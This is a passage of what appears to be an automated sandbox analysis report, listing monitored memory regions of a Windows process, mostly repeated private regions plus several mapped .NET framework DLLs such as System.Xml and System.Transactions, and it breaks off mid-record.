start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 804 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 805 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 806 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 807 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 808 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 809 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 810 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 811 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 812 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 813 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 814 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 815 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 816 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 817 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 818 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 819 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 820 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 821 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 822 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 823 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 824 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 825 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 826 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 827 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 828 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 829 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 830 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 831 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 832 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 833 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 834 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 835 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 836 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 837 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 838 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 839 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 840 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 841 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 842 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 843 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 844 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 845 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 846 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 847 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 848 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 849 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 850 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 851 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 852 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 853 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 854 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 855 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 856 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 857 start_va = 0x67080000 end_va = 0x67795fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\1f87b5140145c221b5201351fffc52d8\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\1f87b5140145c221b5201351fffc52d8\\system.xml.ni.dll") Region: id = 858 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 859 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 860 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 861 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 862 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 863 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 864 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 865 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 866 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 867 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 868 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 869 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 870 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 871 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 872 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 873 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 874 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 875 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 876 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 877 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 878 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 879 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 880 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 881 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 882 start_va = 0x6cdb0000 end_va = 0x6ce72fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.servicemodel.internals.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Servd1dec626#\\80366b2f53761589c602827eb7cee9f2\\System.ServiceModel.Internals.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.servd1dec626#\\80366b2f53761589c602827eb7cee9f2\\system.servicemodel.internals.ni.dll") Region: id = 883 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 884 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 885 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 886 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 887 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 888 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 889 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 890 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 891 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 892 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 893 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 894 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 895 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 896 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 897 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 898 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 899 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 900 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 901 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 902 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 903 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 904 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 905 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 906 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 907 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 908 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 909 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 910 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 911 start_va = 0x66f90000 end_va = 0x6707efff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\1b51e779650e38bb712f3e535efcf132\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\1b51e779650e38bb712f3e535efcf132\\system.configuration.ni.dll") Region: id = 912 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 913 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 914 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 915 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 916 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 917 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 918 start_va = 0x4d60000 end_va = 0x4d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d60000" filename = "" Region: id = 919 start_va = 0x4d70000 end_va = 0x4d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d70000" filename = "" Region: id = 920 start_va = 0x4d80000 end_va = 0x4d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d80000" filename = "" Region: id = 921 start_va = 0x4d90000 end_va = 0x4d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d90000" filename = "" Region: id = 922 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 923 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 924 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 925 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 926 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 927 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 928 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 929 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 930 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 931 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 932 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 933 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 934 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 935 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 936 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 937 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 938 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 939 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 940 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 941 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 942 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 943 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 944 start_va = 0x66ee0000 end_va = 0x66f8dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Transactions\\8a03e2886313defa91cef9f385480f4e\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.transactions\\8a03e2886313defa91cef9f385480f4e\\system.transactions.ni.dll") Region: id = 945 start_va = 0x66e90000 end_va = 0x66edafff monitored = 1 entry_point = 0x66eaf53e region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 946 start_va = 0x4d60000 end_va = 0x4daafff monitored = 1 entry_point = 0x4d7f53e region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 947 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 948 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 949 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 950 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 951 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 952 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 953 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 954 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 955 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 956 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 957 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 958 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 959 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 960 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 961 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 962 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 963 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 964 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 965 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 966 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 967 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 968 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 969 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 970 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 971 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 972 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 973 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 974 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 975 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 976 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 977 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 978 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 979 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 980 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 981 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 982 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 983 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 984 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 985 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 986 start_va = 0x4d60000 end_va = 0x4d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d60000" filename = "" Region: id = 987 start_va = 0x4d60000 end_va = 0x4d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d60000" filename = "" Region: id = 988 start_va = 0x4d60000 end_va = 0x4d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d60000" filename = "" Region: id = 989 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 990 start_va = 0x4d50000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = 